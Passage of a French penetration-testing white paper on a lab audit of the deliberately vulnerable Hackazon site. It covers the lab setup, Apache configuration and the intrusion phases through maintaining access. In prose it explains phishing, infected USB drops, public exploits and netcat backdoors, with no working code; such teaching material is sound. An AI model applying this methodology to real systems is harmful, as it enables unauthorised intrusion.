(Thibault MILLANT) Pentest / Tests D'intrusion: Cas Pratique Sur Le Site E-Commerce Hackazon

Livre Blanc
Pentest / Tests dIntrusion

Cas pratique sur le site Hackazon
Where Passion Leads to Excellence
Version 1.0
ISBN : 978-2-9558088-0-1
Rdacteur :
Thibault MILLANT
tmillantts1@yahoo.fr
Promo 2016
Superviseur :
Jean-Franois BRAUD
jean-francois.beraud@avisto.com
28 Juillet 2016
Rsum
Ce livre blanc fournissant des recommandations sur la scurisation dun site web et dtaillant les diffrentes attaques pour amliorer la comprhension des dangers prsents sur le Web.
Cela fait des annes que lon entend parler des vulnrabilits, telles que les Injections SQL, CrossSite Scripting, Cross-Site Request Forgery, etc. Elles restent pourtant trs prsentes sur le Web.
Parce que mconnues, ou mal comprises, nous avons souhaiter rdiger ce document afin dexpliquer
leurs principes, via le cas concret du site Hackazon, et de proposer diffrents moyens de scurisation de
ces failles courantes pouvant avoir un impact fort pour la scurit des usagers ou des administrateurs.
Table des matires

I
Les mtiers de la Cyber Scurit

0.1
0.2
0.3
0.4
II
Architecte de scurit . . . . . . . . . . . . . . . . . . .
Expert en scurit des systmes dinformation . . . . .
Expert des tests dintrusion . . . . . . . . . . . . . . . .
Responsable de la scurit des systmes dinformation
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Environnement
3
4
4
4
0.5 Le serveur cible . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

0.5.1 Hackazon . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
0.6 Lordinateur dattaque . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
III Audit de scurit du site Web Hackazon

Les 5 phases dune intrusion
6
6
8
1 Phase 1 : Reconnaissance
1.1 Reconnaissance Passive . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1.2 Sniffing rseau . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1.3 Reconnaissance Active . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
10
10
10
11
2 Phase 2 : Scanning
2.1 Arachni : Scanner de Vulnrabilits Web . . . . . . . . . . . . . . . . . . . . . . . . . . . .
2.1.1 Prsentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
2.1.2 Rsultats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
12
12
12
12
3 Phase 3 : Obtenir des accs
14
4 Phase 4 : Maintien des accs
16
5 Phase 5 : Effacement des traces
17
IV
18
Recueil des 7 catgories de failles
6 "Upload"
6.1 Prsentation
6.2 Dcouverte .
6.3 Exploitation .
6.4 Scurisation .
6.5 Surveillance .
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
19
19
19
19
19
21
7 CSRF : Cross-Site Request Forgery

7.1 Prsentation . . . . . . . . . . . . . . . . . .
7.1.1 Fonctionnement . . . . . . . . . . . .
7.2 Dcouverte . . . . . . . . . . . . . . . . . . .
7.3 Exploitation . . . . . . . . . . . . . . . . . . .
7.4 Correctif . . . . . . . . . . . . . . . . . . . . .
7.4.1 Cration de tokens synchroniss . . .
7.4.2 Systme de dfense double cookies
7.4.3 Encrypted Token Pattern . . . . . . .
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
22
22
23
23
23
23
24
24
24
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Tests dintrusion
7.4.4 Header customis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
24
8 LFI : Local File Inclusion

8.1 Prsentation . . . .
8.2 Dcouverte . . . . .
8.3 Exploitation . . . . .
8.4 Correctifs . . . . . .
8.5 Surveillance . . . . .
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
25
25
25
25
26
27
9 Path Traversal
9.1 Prsentation
9.2 Dcouverte .
9.3 Exploitation .
9.4 Correctif . . .
9.5 Surveillance .
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
29
29
29
29
30
31
10 Operating System command injection

10.1 Prsentation . . . . . . . . . . . . .
10.2 Dcouverte . . . . . . . . . . . . . .
10.3 Exploitation . . . . . . . . . . . . . .
10.4 Correction . . . . . . . . . . . . . . .
10.4.1 Escapeshellarg . . . . . . . .
10.5 Surveillance . . . . . . . . . . . . . .
10.6 Remarques . . . . . . . . . . . . . .
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
32
32
32
32
33
33
33
34
11 Blind SQL Injection

11.1 Prsentation .
11.2 Dcouverte . .
11.3 Exploitation . .
11.4 Correctif . . . .
11.5 Surveillance . .
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
35
35
35
35
36
37
12 XSS : Cross-Site Scripting

12.1 Prsentation . . . . . .
12.2 Dcouverte . . . . . . .
12.3 Exploitation . . . . . . .
12.4 Correctif . . . . . . . . .
12.5 Surveillance . . . . . . .
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
38
38
38
39
39
39
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Conclusion
Thibault MILLANT
40
Juillet 2016
Premire partie
Les mtiers de la Cyber Scurit
Tests dintrusion
Figure 1 Gestion de la conformit par les risques mtiers. (Source : Inventy)
0.1
Architecte de scurit
Larchitecte de scurit structure les choix techniques, technologiques et mthodologiques dun ensemble (systme dinformation, logiciel) rpondant des exigences de scurit, en cohrence avec les activits quivalentes ralises au niveau de la solution qui
lintgre. Il sassure de la dclinaison optimale des exigences techniques dentre (fonctionnalits offrir, contraintes de performance, dinteroprabilit, dinterchangeabilit, de robustesse, dintgration de solutions sur tagre, dexportabilit), selon des critres de cot, defficacit, de stabilit, de matrise, de niveau de risque, de respect des standards, daptitude
la production, au dploiement et la maintenance MCO (maintien en conditions oprationnelles) et MCS (maintien en conditions de scurit).
Il identifie et valide la cartographie du systme dinformation et notamment sassure que
les hypothses de scurit relatives lenvironnement de son architecture sont clairement
nonces et prises en compte dans sa conception. Il veille ce que les exigences de scurisation applicables aux diffrents constituants de son architecture ou aux outils permettant
de la produire soient effectivement dclines. Il fournit la connaissance de ltat de lart des
architectures prenant en compte les dveloppements futurs et il prpare les dossiers de
conception et de justification.
(Source : ANSSI)
Thibault MILLANT
Juillet 2016
Tests dintrusion
0.2
Expert en scurit des systmes dinformation

Lexpert en SSI / cyberscurit est en capacit de traiter des dossiers complexes (primtre
denvergure ou spcificit technique pousse). Ses connaissances approfondies des rfrentiels de scurit, rglementations, produits et systmes lui permettent dinstruire des dossiers de scurit et de les soutenir auprs des acteurs du domaine (administration, instances
de rgulation, CESTI).
Ses capacits pdagogiques et rdactionnelles lui permettent dlaborer des argumentaires
techniques dtaills, voire de proposer de nouveaux dveloppements pour constituer ses
dossiers. Sa connaissance des solutions techniques lui permet dargumenter sur les spcifications de scurit avec des dveloppeurs et des intgrateurs, en charge de dfinir et
dimplmenter les architectures. Une expertise scurit cible peut couvrir lensemble des
fonctionnalits dun produit ou de logiciels complexes dditeurs ou encore des domaines
spcifiques comme les noyaux ou protocoles autour des mtiers de lembarqu, la tlphonie sur IP, les multiples technologies associes au cloud computing voire aux systmes
nouveaux (systmes darmes, systmes de contrle industriels. . . ).
(Source : ANSSI)
0.3
Expert des tests dintrusion

Lexpert des tests dintrusion, ou hacker thique , est en mesure de pntrer le systme
dinformation et didentifier les divers chemins dintrusions, les techniques classiques ou atypiques utilises, traant ainsi le profil (profiling) des attaquants, leurs habitudes et mthode
de travail (accs, dpt, exfiltration, habitudes, priodicit. . . ).
Il connat les principes de protection des produits de scurit, leurs limites voire leurs mthodes de contournement. Se tenant inform grce aux forums ad hoc et revues spcialises,
il est en mesure de dvelopper des scnarios dintrusion ltat de lart et peut se spcialiser sur certaines cibles techniques (systmes dexploitation, tlphonie sur IP, protocoles
rseau, etc).
(Source : ANSSI)
0.4
Responsable de la scurit des systmes dinformation

Le responsable de la scurit des systmes dinformation se charge de proposer lautorit
comptente la politique de scurit du SI et de veiller son application. Le RSSI assure
un rle de conseil, dassistance, dinformation, de formation et dalerte. Il peut intervenir en
matire de SSI sur tout ou partie des systmes informatiques et tlcoms de son entit, tant
au niveau technique quorganisationnel. Il effectue un travail de veille technologique et rglementaire sur son domaine et propose les volutions quil juge ncessaires pour garantir la
scurit du systme dinformation dans son ensemble. Il est linterface reconnue des exploitants et des chefs de projets, mais aussi des experts et des intervenants extrieurs pour les
problmatiques de scurit de tout ou partie du SI.
(Source : ANSSI)
Thibault MILLANT
Juillet 2016
Deuxime partie
Environnement
Tests dintrusion
0.5
Le serveur cible
Sur le serveur cible, on trouve la dernire version dUbuntu, la version Ubuntu 15.10 Wily 1 . La version du kernel 2 est la 4.2.0-27.
On y trouve une infrastructure LAMP 3 avec un serveur Web Apache qui hberge le site Web Hackazon (comme recommand sur le Wiki 4 de ce dernier).
La version dApache est la 2.4.12 cre le 24 Juillet 2015.
La version de PHP est la 5.16.11 et celle de MySQL est la 5.6.28.
Le serveur a t configur en IP fixe pour y faciliter laccs : 192.168.100.123
0.5.1
Hackazon
Hackazon est un site dvelopp par Rapid7, qui utilise des technologies Web actuelles (JSON, XML,
GwT, AMF, AJAX, API REST, etc...) et contenant des vulnrabilits de type injection SQL, CSRF, XSS,
Inclusion, etc...
Il est ainsi possible de sessayer ou de se perfectionner la scurit informatique, notamment aux Tests
dintrusion en recherchant ces vulnrabilits.
Hackazon a t install avec la configuration recommand sur le Wiki 5 .
Voici le fichier de configuration du site :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ServerName hackazon.lc
DocumentRoot /var/www/hackazon/web
<Directory />
Options FollowSymLinks
AllowOverride All
Order deny,allow
Allow from all
</Directory>
<Directory /var/www/hackazon/web/>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
Allow from all
</Directory>
Listing 1 Fichier de configuration Apache pour le site Hackazon

Le site nutilise donc pas de HTTPS pour chiffrer les changes. Il est vident que cela reprsente
une faille, notamment sur les pages dauthentification.
Nous nutiliserons pas cette avantage dans notre mission.
1. http://www.ubuntu.com/
2. Noyau Linux
3. Linux Apache MySQL PHP
4. https://github.com/rapid7/hackazon/blob/master/docs/InstallationGuide.pdf
https://github.com/rapid7/hackazon/wiki/Tutorial
5. https://github.com/rapid7/hackazon/wiki/Tutorial
Thibault MILLANT
Juillet 2016
Tests dintrusion
La configuration dApache2, laisse par dfaut, est la suivante :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
# Global configuration
#
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
# ErrorLog: The location of the error log file .
# If you do not specify an ErrorLog directive within a <VirtualHost>
# container, error messages relating to that virtual host will be
# logged here. If you do define an error logfile for a <VirtualHost>
# container, that hosts errors will be logged there and not here.
#
ErrorLog ${APACHE_LOG_DIR}/error.log
#
# LogLevel: Control the severity of messages logged to the error_log.
# Available values: trace8, ... , trace1, debug, info, notice , warn,
# error , crit , alert , emerg.
# It is also possible to configure the log level for particular modules, e.g.
# "LogLevel info ssl :warn"
#
LogLevel warn
# Sets the default security model of the Apache2 HTTPD server. It does
# not allow access to the root filesystem outside of /usr/share and /var/www.
# The former is used by web applications packaged in Debian,
# the latter may be used for local directories served by the web server. If
# your system is serving content from a subdirectory in /srv you must allow
# access here, or in any related virtual host.
<Directory />
Options FollowSymLinks
AllowOverride None
Require all denied
</Directory>
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
#
# The following directives define some format nicknames for use with
# a CustomLog directive.
#
# These deviate from the Common Log Format definitions in that they use %O
# (the actual bytes sent including headers) instead of %b (the size of the
# requested file ) , because the latter makes it impossible to detect partial
# requests.
#
# Note that the use of %{XForwardedFor}i instead of %h is not recommended.
# Use mod_remoteip instead.
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{UserAgent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{UserAgent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i > %U" referer
LogFormat "%{Useragent}i" agent
Listing 2 Fichier de configuration Apache2

Le fichier /etc/apache2/envvars indique que lutilisateur pour apache2 est www-data par dfaut dans
notre configuration.
On trouve aussi des informations sur la configuration des logs (fichiers derreur, niveau de log, format
des logs, etc...), ainsi que les configurations des diffrents principaux dossiers.
Thibault MILLANT
Juillet 2016
Tests dintrusion
0.6
Lordinateur dattaque
Le second ordinateur fait tourner la dernire version de Kalilinux 6 (descendant de Backtrack) afin
dauditer la scurit du site Hackazon. Cest une rolling release 7 .
Les mises jour du serveur sont effectues une fois par semaine.
Plusieurs outils ont t installs pour complter la distribution, notamment des scanners de vulnrabilits tels que Nessus 8 et Arachni 9 .
6.
7.
8.
9.
https://www.kali.org/
Principe de mise jour en continue, sans besoin de rinstaller.
https://www.tenable.com/products/nessus-vulnerability-scanner
http://www.arachni-scanner.com/
Thibault MILLANT
Juillet 2016
Troisime partie
Audit de scurit du site Web

Hackazon
Les 5 phases dune intrusion
10
Chapitre 1
Phase 1 : Reconnaissance
La phase de reconnaissance a pour but de rcuprer, par divers moyens, le plus grand nombre
dinformations possibles, relativement discrtement, dans le but davoir une bonne vision des diffrents
points dentre, des points vulnrables, etc...
Cest la premire phase, il est donc important de ne pas se faire reprer, que ce soit physiquement
ou numriquement, afin de ne pas compromettre le reste de lopration.
1.1
Reconnaissance Passive
Lide est de rcuprer des informations sur la cible sans engager dchange avec celle-ci. Cest un
moyen de rester discret, dans lombre, avant de passer une phase plus agressive.
La reconnaissance passive nimplique pas forcment un ordinateur. Cela peut consister se rendre
devant la socit pour observer les horaires de travail des personnes cibles, afin de pouvoir effectuer
des actions sans quelle puisse le remarquer (ralentissements ou comportements anormaux de leur
poste de travail).
Google est aussi une grande source dinformation afin de collecter des dtails sur la compagnie, les
employers, etc.
Le Social Engineering 1 et le Dumpster diving 2 peuvent aussi tre utilis pour collecter des informations souvent trs utiles en vue deffectuer une intrusion.
1.2
Sniffing rseau
Le sniffing rseau consiste observer et rcuprer les changes qui se font sur le rseau. Il faut
donc avoir un accs au rseau.
Contrairement au scanner rseau (actif), le sniffing rseau est un procd passif. Il nimplique pas daction de la part de lattaquant vers la cible.
Le hacker se place en coute afin dobtenir un maximum dinformations.
1. Lingnierie sociale (ou social engineering en anglais) est une forme dacquisition dloyale dinformation et descroquerie,
utilise en informatique pour obtenir dautrui, un bien, un service ou des informations clefs. Cette pratique exploite les failles humaines et sociales de la structure cible, laquelle est li le systme informatique vis. Utilisant ses connaissances, son charisme,
limposture ou le culot, lattaquant abuse de la confiance, de lignorance ou de la crdulit des personnes possdant ce quil tente
dobtenir.
(Source : Wikipdia)
2. Principe de fouiller dans les poubelles, dchets, etc. professionnels ou personnels afin de rcuprer des informations.
11
Tests dintrusion
1.3
Reconnaissance Active
La reconnaissance active applique un change entre le hacker et la cible afin dobtenir de nombreuses informations, telles que des adresses IP, les services utiliss, les OS 3 utiliss.
De part leur cot actif, les risques de dtection sont plus importants que lors dune reconnaissance passive.
En effet, des outils comme Telnet, nslookup, netcat, etc... vont communiquer directement avec la cible,
via lenvoi de requtes. Nous laissons donc des traces de nos changes, et nous nous "faisons connatre"
en initiant une communication (log de connexion telnet).
Ce type de reconnaissances peut nous informer sur les diverses scurits (portes verrouilles, systmes douverture de portes, etc.)
Vu que je me suis charg de faire linstallation, je navais pas besoin deffectuer cette partie, ayant
dj toutes les informations.
Jai tout de mme effectu cette phase de reconnaissance afin de montrer comment rcuprer les
diverses informations.
3. Operating System
Thibault MILLANT
12
Juillet 2016
Chapitre 2
Phase 2 : Scanning
Avec les informations obtenues dans la phrase prcdente, nous allons scanner les diffrentes
adresses IPs, services.
Pour cela, nous avons recourt diffrents types de scanner, dont des scanners de vulnrabilits.
Ces derniers peuvent tre gnralistes ou plus ou moins spcialiss.
Lobjectif consistait auditer le site Web Hackazon dploy pour loccasion.
Jai donc principalement utilis des scanners de vulnrabilits orients Web, tels que Nikto 1 , ou Arachni,
mais aussi OpenVAS 2 et Nessus, plus gnralistes.
2.1 Arachni : Scanner de Vulnrabilits Web

2.1.1
Prsentation
Arachni est framework complet, modulaire, de haute performance, crit en Ruby, visant
aider les pentesters et les administrateurs valuer la scurit des applications Web.
Il est intelligent, il se forme par le suivi et lapprentissage du comportement de lapplication Web au cours du processus de scan et est en mesure deffectuer une mta-analyse en
utilisant un certain nombre de facteurs afin dvaluer correctement la fiabilit des rsultats et
intelligemment identifier (ou viter) les faux-positifs.
Contrairement dautres scanners, il tient compte de la nature dynamique des applications Web, permet de dtecter les changements causs lors dun dplacement travers les
chemins de la complexit cyclomatique dune application web et est capable de sajuster en
consquence. De cette faon, les vecteurs dattaque / dentre qui seraient autrement indtectables par les non-humains peuvent tre traits de faon transparente.
En outre, en raison de son intgration dans lenvironnement du navigateur, il peut galement contrler et dinspecter le code ct client, et supporte des applications web trs
compliques qui font un usage intensif des technologies telles que JavaScript, HTML5, manipulation DOM et AJAX.
Enfin, il est suffisamment polyvalent pour couvrir un grand nombre de cas dutilisation,
allant dun utilitaire de scanner en ligne de commande simple, un rseau global de scanners de haute performance, une bibliothque Ruby permettant audits scriptes, un multiutilisateur multi-scan web plateforme de collaboration.
(Source : arachni-scanner.com)
2.1.2
Rsultats
Le premier scan du site web e-commerce Hackazon a dur 11 jours, 13 heures, 34 minutes et 36
secondes et a test 46 197 pages.
1. https://www.cirt.net/Nikto2
2. http://www.openvas.org/
13
Tests dintrusion
Il a envoy 30 784 989 requtes HTTP, soit 32,701 requtes par secondes.
Les failles dtectes sont classes en deux types : les trusted correspondant aux failles considres
comme fiables, et les untrusted pouvant tre des faux positifs, car le serveur prsentait un comportement
anormale ou pouvait subir des interfrences dues des actions provenant dune utilisation extrieure
au scanner.
Dans ces catgories, on retrouve les failles prsentant un risque lev, moyen, ou faible, et dordre informationnel.
Pour les failles trusted, on obtient 17 failles prsentant un risque lev, 3 prsentant un risque moyen,
1381 prsentant un risque faible, et 30 dordre informationnel.
Pour les failles untrusted, on obtient 1 faille prsentant un risque lev, 4 prsentant un risque moyen,
et 1 prsentant un risque faible.
Nous allons faire, dans la 4e partie de ce document, un recueil dtaill des failles de niveau "risque
lev".
Thibault MILLANT
14
Juillet 2016
Chapitre 3
Phase 3 : Obtenir des accs

Maintenant que nous avons dcouvert des vulnrabilits grce aux phases de reconnaissance et de
scanning, nous pouvons passer la phase dexploitation.
Lobtention des accs est la phase la plus importante dune attaque en termes de dommages potentiels.
Les attaques DDOS 1 peuvent tre un moyen de causer des dommages, mais nous ne les aborderons
pas dans ce document.
Cette phase a pour but dobtenir des accs sur la cible (accs user, administrateur / root). Pour cela,
le hacker va utiliser des exploits 2 reposant sur les vulnrabilits dcouvertes.
Ces exploits peuvent tre locaux, hors-ligne, au sein dun LAN ou travers Internet (Buffer Overflow 3 ,
DOS, Session Hijacking 4 , etc...).
Pour cela, le hacker va utiliser tous les points daccs dcouverts. Il peut sattaquer aux rseaux,
des sites web, des applications, etc... Il peut aussi utiliser des techniques de social engineering.
Cest dailleurs un des moyens les plus utiliss et les plus efficaces pour atteindre son but. On trouve
diffrentes techniques reposant sur la faille humaine.
Aprs tude des habitudes des employs dune socit, on peut faire en sorte de leur faire ramasser
une cl USB pirate afin quil la branche sur son ordinateur et active la charge virale permettant aux
hackers dobtenir un accs distant sur un ordinateur reli au rseau de lentreprise.
Le phishing 5 est aussi trs utilis. Elle peut consister inciter un employ, par lintermdiaire dun
email, se rendre sur un site web pirate afin de rcuprer des informations de compte (login / mot de
passe), installer un programme malveillant sur son ordinateur, etc...
1. Distributed Denial Of Service. Une attaque par dni de service (denial of service attack, do labrviation DoS) est une attaque informatique ayant pour but de rendre indisponible un service, dempcher les utilisateurs lgitimes dun service de lutiliser.
Il peut sagir dinondater un rseau afin dempcher son fonctionnement, de perturber des connexions entre deux machines, dempcher laccs un service particulier, de faire de lobstruction daccs un service une personne en particulier et galement
de faire envoyer envoyer des milliards doctets une box internet.
Lattaque par dni de service peut ainsi bloquer un serveur de fichiers, rendre impossible laccs un serveur web ou empcher
la distribution de courriel dans une entreprise. (Source : Wikipdia)
2. Un exploit est, dans le domaine de la scurit informatique, un lment de programme permettant un individu ou
un logiciel malveillants dexploiter une faille de scurit informatique dans un systme dexploitation ou un logiciel, que ce soit
distance (remote exploit) ou sur la machine sur laquelle cet exploit est excut (local exploit) ; ceci, afin de semparer dun
ordinateur ou dun rseau, daccrotre le privilge dun logiciel ou dun utilisateur, ou encore deffectuer une attaque par dni de
service. (Source : Wikipdia)
3. En informatique, un dpassement de tampon ou dbordement de tampon (en anglais, buffer overflow) est un bug par lequel
un processus, lors de lcriture dans un tampon, crit lextrieur de lespace allou au tampon, crasant ainsi des informations
ncessaires au processus.
Lorsque le bug se produit non intentionnellement, le comportement de lordinateur devient imprvisible. Il en rsulte souvent un
blocage du programme, voire de tout le systme.
Le bug peut aussi tre provoqu intentionnellement et tre exploit pour violer la politique de scurit dun systme. Cette technique est couramment utilise par les pirates. La stratgie de lattaquant est alors de dtourner le programme bugu en lui faisant
excuter des instructions quil a introduites dans le processus. (Source : Wikipdia)
4. Rcupration du cookie de session dun utilisateur dun site Web, via un programme comme sslstrip par exemple. (Source :
Wikipdia)
5. Lhameonnage, phishing ou filoutage est une technique utilise par des fraudeurs pour obtenir des renseignements personnels dans le but de perptrer une usurpation didentit. La technique consiste faire croire la victime quelle sadresse un
tiers de confiance banque, administration, etc. afin de lui soutirer des renseignements personnels : mot de passe, numro
de carte de crdit, date de naissance, etc. Cest une forme dattaque informatique reposant sur lingnierie sociale. Elle peut se
faire par courrier lectronique, par des sites web falsifis ou autres moyens lectroniques. (Source : Wikipdia)
15
Tests dintrusion
Vous trouverez dans ce document diffrentes mthodes permettant dobtenir des accs sur le serveur via lexploitation de diffrentes vulnrabilits.
Un autre moyen dobtenir des accs repose sur les informations de la machine cible rcuprs. En
effet, nous avons, dans les premires phases, rcupr des informations sur les services et logiciels
tournant sur la machine cible, ainsi que leur version.
Nous pouvons nous rendre sur des sites comme www.exploit-db.com afin de rcuprer les exploits
connus associs aux versions des services de la cible et les excuter. En effet, sur une architecture de
production, les mises jour sont souvent appliques avec beaucoup de retard car il faut sassurer que
ces dernires ne vont pas dgrader le fonctionnement du serveur de production. Il est donc fortement
possible que les exploits soient toujours efficaces.
Nous pouvons aussi utiliser le framework Metasploit afin dutiliser un grand nombre dexploits, ou de
crer nos propres payloads 6 .
6. En informatique, on utilise ce terme au figur pour dsigner la partie du code excutable dun virus qui est spcifiquement
destine nuire (par opposition au code utilis par le virus pour se rpliquer notamment). (Source : Wikipdia)
Thibault MILLANT
16
Juillet 2016
Chapitre 4
Phase 4 : Maintien des accs

Exploiter une vulnrabilit et obtenir des accs est une chose, maintenir laccs en est une autre.
En effet, il est intressant pour un hacker dobtenir un accs permanent la machine cible. Si lattaque
est dtect, ou du moins lintrusion, il est possible que la vulnrabilit soit corrige. Il est aussi possible
quune mise jour ayant lieu aprs lattaque vienne corriger la faille.
Dans ce cas, le hacker ne pourra plus accder la cible en utilisant le mme exploit. Il peut tre long
et laborieux de refaire toute une exploitation dune vulnrabilit. Cest pourquoi lattaquant va chercher
mettre en place un moyen daccder distance sa cible.
Pour cela, on upload gnralement un bout de code (appel backdoor 1 ) sur la cible permettant de
sy connecter tout moment.
Il est aussi possible dutiliser des outils natifs de la cible, loutil Netcat 2 par exemple, afin de permettre
une connexion distance sur un shell 3 permettant dutiliser les commandes de la machine cible, comme
si on se trouvait devant.
1. Dans un logiciel, une porte drobe (de langlais backdoor, littralement porte de derrire) est une fonctionnalit inconnue
de lutilisateur lgitime, qui donne un accs secret au logiciel. (Source : Wikipdia)
2. En informatique, netcat est un utilitaire permettant douvrir des connexions rseau, que ce soit UDP ou TCP. Il est conu
pour tre incorpor aisment dans un large panel dapplications. En raison de sa polyvalence, netcat est aussi appel le couteau
suisse du TCP/IP . Il existe sur plusieurs systmes dexploitation et sutilise en ligne de commande. (Source : Wikipdia)
